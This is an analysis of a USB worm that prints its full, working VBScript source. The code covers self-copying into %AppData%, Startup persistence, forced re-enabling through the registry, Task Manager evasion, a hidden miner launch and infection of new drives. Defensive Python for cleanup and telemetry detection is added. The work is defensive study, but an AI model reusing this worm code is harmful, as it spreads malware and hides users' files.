Reading the source code of a common USB flash-drive virus
2018-03-02 21:44
Contents
1. Symptoms
2. Source code walkthrough
  2.1 The shortcut file
  2.2 The movemenoreg.vbs file
  2.3 The helper.vbs file
  2.4 The installer.vbs file
3. Workflow
  3.1 From USB drive to computer
  3.2 From computer to USB drive
4. Summary
1. Symptoms
The virus creates two hidden directories and one shortcut file in the root of an infected USB drive. The two hidden directories are named "-" (the scripts below actually create it as "_") and "WindowsServices". The "-" directory holds all of the files that were originally on the user's drive; the "WindowsServices" directory holds three virus files: movemenoreg.vbs, installer.vbs and helper.vbs. (The source code shows that there are really four files; the fourth is WindowsServices.exe, which simply was not present on my drive.) The shortcut file has the same name as the user's USB drive (its volume label).
2. Source code walkthrough
2.1 The shortcut file
The shortcut file is only an entry point: it misleads the user into clicking it, which starts the virus's main file. The shortcut's target is:
%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
%COMSPEC% is an environment variable that expands to C:\Windows\system32\cmd.exe, so the virus file movemenoreg.vbs is opened through cmd.exe.
2.2 The movemenoreg.vbs file
' When an error occurs, keep executing the next statement
on error resume next
' Declare the variables used below
Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
' Get a WScript.Shell object
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
' Open the directory named "_" in the drive root, i.e. the one that really holds all of the user's files
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
' Chr(34) is the double-quote character
ws.Run Chr(34) & pfolder & "\_" & Chr(34)
AppData = ws.ExpandEnvironmentStrings("%AppData%")
DestFolder = AppData & Target
' Create the destination directory, %AppData%\WindowsServices
if (not objws.folderexists(DestFolder)) then
    objws.CreateFolder DestFolder
    Set objDestFolder = objws.GetFolder(DestFolder)
end if
' Copy the four virus files into the destination directory and hide them, then hide the directory itself
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39

sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        ' Copy the file
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)
        ' Hide the file: 39 = ReadOnly (1) + Hidden (2) + System (4) + Archive (32).
        ' VBScript parses this as (Not Attributes) And 39, which is non-zero
        ' whenever at least one of those four bits is still clear.
        If not objmove.Attributes AND 39 then
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if
    end if
end sub

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
' Look through the running processes for helper.vbs; if it is already running, exit this script
For Each objProcess In colProcess
    vaprocess = objProcess.CommandLine
    if instr(vaprocess, "helper.vbs") then
        WScript.quit
    End if
Next
' Run helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)
Set ws = Nothing
2.3 The helper.vbs file
on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
' Get the path of the user's Startup folder
startupPath = ws.SpecialFolders("startup")
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
MyScript = "helper.vbs"
While True
    ' If Windows has already recorded a StartupApproved entry for helper.lnk (it creates one
    ' when the user disables the item in Task Manager), overwrite it with 2, the "enabled" value
    key = Empty
    key = ws.regread (nkey)
    If (not IsEmpty(key)) then
        ws.RegWrite nkey, 2, "REG_BINARY"
    End if
    If (not objws.fileexists(startupPath & "\helper.lnk")) then
        ' Create a shortcut to helper.vbs in the Startup folder
        Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
        link.Description = "helper"
        link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
        link.WorkingDirectory = strPath
        link.Save
    End If
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    ' Check whether installer.vbs is running; if not, run it
    call procheck(colProcess, "installer.vbs")
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
    Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")
    if colProcess.count = 0 And tskProcess.count = 0 then
        ' Run WindowsServices.exe (window style 0 = hidden)
        ws.Run miner, 0
    ElseIf colProcess.count > 0 And tskProcess.count > 0 then
        ' If the user has opened Task Manager, kill WindowsServices.exe
        For Each objProcess In colProcess
            ws.run "taskkill /PID " & objProcess.ProcessId , 0
        Next
    end if
    WScript.Sleep 3000
Wend
'---------------------------------------------------------------------------------
sub procheck(checkme, procname)
    For Each objProcess In checkme
        vaprocess = objProcess.CommandLine
        if instr(vaprocess, procname) then
            Exit sub
        End if
    Next
    ws.Run Chr(34) & strPath & procname & Chr(34)
end sub
'--------------------------------------------------------------------------------
2.4 The installer.vbs file
The installer.vbs file is what infects newly inserted USB drives.
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
' Subscribe to logical-disk change events, polled once per second
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
While True
    ' Check whether helper.vbs is running; if not, run helper.vbs
    Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
    call procheck(colProcess, "helper.vbs")
    ' Take the next event (blocks until one arrives)
    Set objEvent = colEvents.NextEvent
    ' DriveType 2 = removable disk
    If objEvent.TargetInstance.DriveType = 2 Then
        If objEvent.Path_.Class = "__InstanceCreationEvent" Then
            ' A new USB drive has been plugged in
            device = objEvent.TargetInstance.DeviceID
            devicename = objEvent.TargetInstance.VolumeName
            DestFolder = device & "\WindowsServices"
            DummyFolder = device & "\" & "_"
            ' Create the destination directory (\WindowsServices) in the drive root
            if (not objws.folderexists(DestFolder)) then
                objws.CreateFolder DestFolder
                Set objDestFolder = objws.GetFolder(DestFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 39
            end if
            ' Copy the four virus files into the destination directory
            Call moveandhide ("\helper.vbs")
            Call moveandhide ("\installer.vbs")
            Call moveandhide ("\movemenoreg.vbs")
            Call moveandhide ("\WindowsServices.exe")
            ' Create, in the drive root, a shortcut that opens movemenoreg.vbs.
            ' (The existence check below omits the "\" that CreateShortcut inserts,
            ' so it never matches and the shortcut is rewritten on every event.)
            if (not objws.fileexists (device & devicename & ".lnk")) then
                Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
                ' Icon 7 in SHELL32.dll is the removable-drive icon, so the shortcut looks like the drive itself
                link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
                link.TargetPath = "%COMSPEC%"
                link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
                ' Window style 7 = minimized, not activated
                link.windowstyle = 7
                link.Save
            End If
            ' Create the directory named "_" in the drive root and hide it (2 = Hidden, 4 = System)
            if (not objws.folderexists(DummyFolder)) then
                objws.CreateFolder DummyFolder
                Set objDestFolder = objws.GetFolder(DummyFolder)
                objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
            End If
            set check = objws.getFolder(device)
            ' Move all of the user's files into the "_" directory
            Call checker(check)
        End If
    End If
Wend

sub checker (path)
    set home = path.Files
    For Each file in home
        Select Case file.Name
            Case devicename & ".lnk"
                ' nothing: leave the decoy shortcut in place
            Case Else
                objws.MoveFile path & file.Name, DummyFolder & "\"
        End Select
    Next
    set home = path.SubFolders
    ' (The loop variable reuses the collection's own name; the original script is kept as written)
    For Each home in home
        Select Case home
            Case path & "_"
                ' nothing
            Case path & "WindowsServices"
                ' nothing
            Case path & "System Volume Information"
                ' nothing
            Case Else
                objws.MoveFolder home, DummyFolder & "\"
        End Select
    Next
end sub
'------------------------------------------------------------
sub moveandhide (name)
    if (not objws.fileexists(DestFolder & name)) then
        objws.CopyFile strFolder & name, DestFolder & "\"
        Set objmove = objws.GetFile(DestFolder & name)
        ' 39 = ReadOnly + Hidden + System + Archive, as in movemenoreg.vbs
        If not objmove.Attributes AND 39 then
            objmove.Attributes = 0
            objmove.Attributes = objmove.Attributes + 39
        end if
    end if
end sub
'------------------------------------------------------------
sub procheck(checkme, procname)
    For Each objProcess In checkme
        vaprocess = objProcess.CommandLine
        if instr(vaprocess, procname) then
            Exit sub
        End if
    Next
    ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
end sub
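The artifacts listed in section 1 and created by installer.vbs (the hidden "_" and "WindowsServices" folders, the three or four script files, and the root .lnk whose arguments run movemenoreg.vbs) are easy to check for and undo from a clean machine. The Python below is an added example written for this page; it is not code from the original post or from the malware. It assumes nothing beyond the names shown in the scripts: the sample drive it builds in a temporary directory is constructed, and the .lnk it writes is a dummy containing only the UTF-16LE argument string, which is what the detection heuristic looks at. On Windows it additionally decodes the ReadOnly/Hidden/System/Archive bits behind the scripts' "+ 39" and "+ 2 + 4" arithmetic via st_file_attributes.

```python
"""Triage and clean a removable drive that shows the artifacts described above.

Added example for this page, not the original post's or the malware's code.
It works on any directory, so it can be exercised offline on a constructed tree.
"""
import shutil
import tempfile
from pathlib import Path

VIRUS_DIR = "WindowsServices"
STASH_DIR = "_"                     # where the worm moves the user's files
VIRUS_FILES = {"movemenoreg.vbs", "helper.vbs", "installer.vbs", "windowsservices.exe"}
LNK_MARKER = "movemenoreg.vbs"      # appears in the decoy shortcut's arguments

# FileSystemObject attribute bits (same values as FILE_ATTRIBUTE_*), so 39 = all four.
FSO_ATTR = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}


def decode_attributes(mask):
    """Name the attribute bits set in a FileSystemObject / FILE_ATTRIBUTE mask."""
    return [name for bit, name in FSO_ATTR.items() if mask & bit]


def lnk_runs_dropper(lnk_path):
    """Heuristic: WScript.Shell stores shortcut arguments as UTF-16LE, so search the
    raw .lnk bytes for the script name in both encodings instead of parsing Shell Link."""
    data = Path(lnk_path).read_bytes()
    return LNK_MARKER.encode("utf-16-le") in data or LNK_MARKER.encode("ascii") in data


def triage(root):
    """Report which of the worm's on-disk artifacts are present under root."""
    root = Path(root)
    found = {"virus_files": [], "stash_dir": False, "decoy_lnks": [], "attributes": {}}
    vdir = root / VIRUS_DIR
    if vdir.is_dir():
        found["virus_files"] = sorted(p.name for p in vdir.iterdir() if p.name.lower() in VIRUS_FILES)
    found["stash_dir"] = (root / STASH_DIR).is_dir()
    for p in sorted(root.iterdir()):
        if p.is_file() and p.suffix.lower() == ".lnk" and lnk_runs_dropper(p):
            found["decoy_lnks"].append(p.name)
    # Windows only: st_file_attributes exposes the Hidden/System bits the scripts set.
    for p in (vdir, root / STASH_DIR):
        if p.exists() and hasattr(p.stat(), "st_file_attributes"):
            found["attributes"][p.name] = decode_attributes(p.stat().st_file_attributes)
    found["infected"] = bool(found["virus_files"]) and (found["stash_dir"] or bool(found["decoy_lnks"]))
    return found


def restore(root, quarantine):
    """Move the user's files back out of "_" and move the worm's files to quarantine.
    Nothing is deleted and nothing is overwritten, so samples and collisions stay reviewable."""
    root, quarantine = Path(root), Path(quarantine)
    quarantine.mkdir(parents=True, exist_ok=True)
    report = {"restored": [], "skipped": [], "quarantined": []}
    stash = root / STASH_DIR
    if stash.is_dir():
        for item in list(stash.iterdir()):
            dest = root / item.name
            if dest.exists():
                report["skipped"].append(item.name)   # leave for manual review
                continue
            shutil.move(str(item), str(dest))
            report["restored"].append(item.name)
        if not any(stash.iterdir()):
            stash.rmdir()
    for name in [VIRUS_DIR] + triage(root)["decoy_lnks"]:
        src = root / name
        if src.exists():
            shutil.move(str(src), str(quarantine / name))
            report["quarantined"].append(name)
    return report


def build_sample_drive(root):
    """Constructed stand-in for an infected drive: same layout, dummy contents."""
    root = Path(root)
    (root / STASH_DIR).mkdir()
    (root / STASH_DIR / "report.docx").write_text("user document")
    (root / STASH_DIR / "photos").mkdir()
    vdir = root / VIRUS_DIR
    vdir.mkdir()
    for name in ("movemenoreg.vbs", "helper.vbs", "installer.vbs"):
        (vdir / name).write_text("' dummy placeholder, not the real script\n")
    # Fake .lnk: only the UTF-16LE argument string matters to lnk_runs_dropper().
    args = "/C .\\WindowsServices\\movemenoreg.vbs".encode("utf-16-le")
    (root / "MYUSB.lnk").write_bytes(b"L\x00\x00\x00" + args)
    (root / "readme.txt").write_text("harmless file left at the root")


def run_demo():
    """Build a sample drive in a temp dir, triage it, clean it, and triage it again."""
    drive = Path(tempfile.mkdtemp(prefix="usb_"))
    quarantine = Path(tempfile.mkdtemp(prefix="quarantine_"))
    build_sample_drive(drive)
    before = triage(drive)
    report = restore(drive, quarantine)
    after = triage(drive)
    return {"before": before, "report": report, "after": after,
            "root_listing": sorted(p.name for p in drive.iterdir())}


if __name__ == "__main__":
    import json
    print(json.dumps(run_demo(), indent=2))
```

On a real drive call triage(r"E:\") and then restore(r"E:\", r"C:\quarantine"), but only after helper.vbs and installer.vbs have been stopped on the machine the drive is plugged into: installer.vbs loops on disk events and would re-create the folders and shortcut as soon as the drive appears. Files are moved rather than deleted, and any name that already exists at the root is left inside "_" for a person to reconcile.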
3. Workflow
3.1 From USB drive to computer
An infected USB drive -> the user clicks the shortcut in the drive root -> the virus copies itself to the %AppData%\WindowsServices directory, adds itself to the startup items, and keeps watching for new USB drives being plugged in; as soon as one is inserted, the virus files are copied to the new drive.
3.2 From computer to USB drive
An infected computer -> the USB virus starts when the computer boots -> the virus detects that a new USB drive has been plugged in -> the virus creates the "-" and "WindowsServices" directories in the root of the new drive, moves all of the user's existing files into "-", copies the four virus code files into "WindowsServices", and creates a shortcut in the drive root that opens the virus file movemenoreg.vbs.
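Sections 2.2, 2.3 and the workflow above describe a chain that host telemetry sees as a handful of distinct events: cmd.exe spawning wscript.exe on movemenoreg.vbs, wscript.exe running helper.vbs and installer.vbs out of %AppData%\WindowsServices, helper.lnk appearing in the Startup folder, the StartupApproved\StartupFolder\helper.lnk value being written, WindowsServices.exe being launched by a script, and taskkill being spawned by a script when Task Manager shows up. The Python below is an added example, not part of the original post, that encodes each step as a detection rule and runs the rules over constructed Sysmon-style events. The field names, user name, drive letter, SID and PID in the sample are all made up; a real deployment would map the predicates onto its own log schema.

```python
"""Host-side detection rules for the infection chain described in sections 2 and 3.

Added example for this page, not the original post's code. The events below are
constructed and only loosely follow Sysmon field names (Image, ParentImage,
CommandLine, TargetFilename, TargetObject).
"""
import re

APPDATA = "C:\\Users\\alice\\AppData\\Roaming"   # constructed profile path
SAMPLE_EVENTS = [
    {"id": 1, "type": "ProcessCreate", "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "C:\\Windows\\system32\\cmd.exe /C .\\WindowsServices\\movemenoreg.vbs"},
    {"id": 2, "type": "ProcessCreate", "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"E:\\WindowsServices\\movemenoreg.vbs\""},
    {"id": 3, "type": "ProcessCreate", "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"" + APPDATA + "\\WindowsServices\\helper.vbs\""},
    {"id": 4, "type": "FileCreate", "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetFilename": APPDATA + "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\helper.lnk"},
    {"id": 5, "type": "RegistryEvent", "Image": "C:\\Windows\\System32\\wscript.exe",
     "TargetObject": "HKU\\S-1-5-21-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer"
                     "\\StartupApproved\\StartupFolder\\helper.lnk"},
    {"id": 6, "type": "ProcessCreate", "Image": APPDATA + "\\WindowsServices\\WindowsServices.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe",
     "CommandLine": "\"" + APPDATA + "\\WindowsServices\\WindowsServices.exe\""},
    {"id": 7, "type": "ProcessCreate", "Image": "C:\\Windows\\System32\\taskkill.exe",
     "ParentImage": "C:\\Windows\\System32\\wscript.exe", "CommandLine": "taskkill /PID 4812"},
    # Benign noise that must not fire: a logon script started from explorer.
    {"id": 8, "type": "ProcessCreate", "Image": "C:\\Windows\\System32\\wscript.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Tools\\logon.vbs\""},
]


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _field(ev, name):
    return ev.get(name, "").lower()


APPDATA_SCRIPT = re.compile(r"\\appdata\\roaming\\windowsservices\\(helper|installer|movemenoreg)\.vbs")

# One predicate per step of the chain; each is written against lower-cased fields.
RULES = {
    # 2.1: the decoy shortcut runs cmd /C ...\WindowsServices\movemenoreg.vbs, so cmd spawns wscript
    "decoy_lnk_launch": lambda ev: ev["type"] == "ProcessCreate"
        and _base(ev["Image"]) == "wscript.exe"
        and _base(_field(ev, "ParentImage")) == "cmd.exe"
        and "\\windowsservices\\movemenoreg.vbs" in _field(ev, "CommandLine"),
    # 2.2/2.3: any of the three scripts executing from %AppData%\WindowsServices
    "appdata_script_run": lambda ev: ev["type"] == "ProcessCreate"
        and _base(ev["Image"]) == "wscript.exe"
        and APPDATA_SCRIPT.search(_field(ev, "CommandLine")) is not None,
    # 2.3: helper.lnk written into the Startup folder by a script host
    "startup_lnk_dropped": lambda ev: ev["type"] == "FileCreate"
        and _base(ev["Image"]) == "wscript.exe"
        and _field(ev, "TargetFilename").endswith("\\startup\\helper.lnk"),
    # 2.3: the StartupApproved value for helper.lnk rewritten by a script host
    "startup_approved_write": lambda ev: ev["type"] == "RegistryEvent"
        and _base(ev["Image"]) == "wscript.exe"
        and "\\startupapproved\\startupfolder\\helper.lnk" in _field(ev, "TargetObject"),
    # 2.3: WindowsServices.exe launched from %AppData% by wscript
    "appdata_payload_exec": lambda ev: ev["type"] == "ProcessCreate"
        and _base(_field(ev, "ParentImage")) == "wscript.exe"
        and "\\appdata\\roaming\\windowsservices\\windowsservices.exe" in _field(ev, "Image"),
    # 2.3: a script host spawning taskkill (the Task Manager evasion loop)
    "script_spawned_taskkill": lambda ev: ev["type"] == "ProcessCreate"
        and _base(ev["Image"]) == "taskkill.exe"
        and _base(_field(ev, "ParentImage")) == "wscript.exe",
}


def detect(events):
    """Return (event id, rule name) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((ev["id"], name))
    return hits


def triggered_rules(events):
    """Rule names seen at least once, in order of first appearance."""
    seen = []
    for _, name in detect(events):
        if name not in seen:
            seen.append(name)
    return seen


if __name__ == "__main__":
    for event_id, rule in detect(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The single strongest signal is the first one: a shortcut on removable media that launches cmd.exe with "/C" on a script path under "\WindowsServices\". The persistence rules are cheap to keep enabled because normal software does not write helper.lnk into the Startup folder from wscript.exe, and the taskkill rule is what makes the helper.vbs "hide from Task Manager" trick visible rather than effective.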
4. Summary
"Small as a sparrow is, it has all five organs": the virus is under three hundred lines of code, yet it can infect a host, seek out new hosts, and resist being found and killed. The variable naming and the division of functionality are both quite sensible, which shows that whoever wrote this virus was well practised in VBS programming and in writing viruses.
Because the WindowsServices.exe file is missing, we cannot know what the author's real goal was, but from the line
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
in helper.vbs we can guess that it is probably a cryptocurrency miner.
Disclaimer: this article analyses the virus's source code purely for study and for sharing knowledge; the author of this article bears no responsibility for any consequences!